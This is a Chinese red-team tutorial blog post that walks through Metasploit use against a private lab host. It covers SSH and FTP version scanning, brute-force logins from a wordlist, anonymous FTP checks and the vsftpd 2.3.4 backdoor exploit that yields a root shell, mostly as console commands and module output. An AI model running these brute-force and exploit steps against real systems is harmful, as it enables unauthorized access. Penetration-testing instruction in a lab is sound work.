红队/白帽必经之路(16)——如何用Metasploit 在边路进行信息刺探及爆破登录[既然是红队,那就对自己狠一点!!!]
红队/白帽必经之路(16)——如何用Metasploit 在边路进行信息刺探及爆破登录[既然是红队,那就对自己狠一点!!!]
盛透侧视攻城狮
发布于 2024-12-25 01:11:39
发布于 2024-12-25 01:11:39
代码可运行
运行总次数:0
代码可运行
1.基于 SSH 协议收集信息
查看 ssh 服务的版本信息
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# msfconsole
Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it
with setg RHOSTS x.x.x.x
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.3.55-dev ]
+ -- --=[ 2397 exploits - 1232 auxiliary - 422 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs
/using-metasploit/basics/using-metasploit.html
RPORT 22 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 30 yes Timeout for the SSH probe
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_version) > run
SSH 暴力破解
msf6 auxiliary(scanner/ssh/ssh_version) > back
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and pass
word
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the cur
rent database
DB_ALL_PASS false no Add all passwords in the current database to th
e list
DB_ALL_USERS false no Add all users in the current database to the li
st
DB_SKIP_EXISTING none no Skip existing credentials stored in the current
database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploit
.com/docs/using-metasploit/basics/using-metaspl
oit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a hos
t
THREADS 1 yes The number of concurrent threads (max one per h
ost)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated b
y space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt 
- 因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果新开一个终端窗口
- 设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。
- 注意:
- 先添加如下用户密码文件,之后在重新试一次即可
──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# echo "msfadmin msfadmin" >> /usr/share/metasploitframework/data/wordlists/root_userpass.txt
回到 MSF 终端
msf6 auxiliary(scanner/ssh/ssh_login) > run
2.基于 FTP 协议收集信息
2.1查看 ftp 服务的版本信息
加载 ftp 服务版本扫描模块
msf6 auxiliary(scanner/ssh/ssh_login) > back
msf6 > use auxiliary/scanner/ftp/ftp_version
查看设置参数
msf6 auxiliary(scanner/ftp/ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target host(s), see https://docs.metasploit.com/
docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.设置目标 IP,可以设置多个
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.180执行扫描,输入 exploit 或 run
msf6 auxiliary(scanner/ftp/ftp_version) > run
- 我们可以发现:扫描出结果是:vsFTPd 2.3.4
退出
msf6 auxiliary(scanner/ftp/ftp_version) > back
msf6 > 扫描出 ftp 服务的版本号,我们可以尝试搜索版本号,看看有没有可以利用的模块[或者搜索 vsftpd]
msf6 > search 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
1 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
2 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
3 exploit/unix/http/zivif_ipcheck_exec 2017-09-01 excellent Yes Zivif Camera iptest.cgi Blind Remote Command Execution
4 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/oscommerce_installer_unauth_code_exec
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service
1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > 
- 发现存在一个 exploit 模块,而且这个版本的 ftp 服务存在一个后门
所以尝试利用下这个模块
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][
...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs
/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
拿到了 shell,而且是 root 权限,那么尝试执行下命令
执行 id 命令, 查看当前用户
执行 ifconfig 命令,查看 IP 地址
2.2 ftp 匿名登录扫描[直接肝就完事了]
- 其实就是利用了漏洞模块罢了
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show options
Module options (auxiliary/scanner/ftp/anonymous):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target host(s), see https://docs.metasploit.com/
docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/anonymous) > run
2.3 ftp 暴力破解
不同于SSH暴力破解的唯一一步:ftp漏洞的模块利用
msf6 auxiliary(scanner/ftp/anonymous) > back
msf6 > use auxiliary/scanner/ftp/ftp_loginmsf6 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show options
Module options (auxiliary/scanner/ftp/anonymous):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target host(s), see https://docs.metasploit.com/
docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/anonymous) > back
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show options
Module options (auxiliary/scanner/ftp/ftp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and pass
word
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the cur
rent database
DB_ALL_PASS false no Add all passwords in the current database to th
e list
DB_ALL_USERS false no Add all users in the current database to the li
st
DB_SKIP_EXISTING none no Skip existing credentials stored in the current
database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:ho
st:port][...]
RECORD_GUEST false no Record anonymous/guest logins to the database
RHOSTS yes The target host(s), see https://docs.metasploit
.com/docs/using-metasploit/basics/using-metaspl
oit.html
RPORT 21 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a hos
t
THREADS 1 yes The number of concurrent threads (max one per h
ost)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated b
y space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
最后run一下即可
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-12-25,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
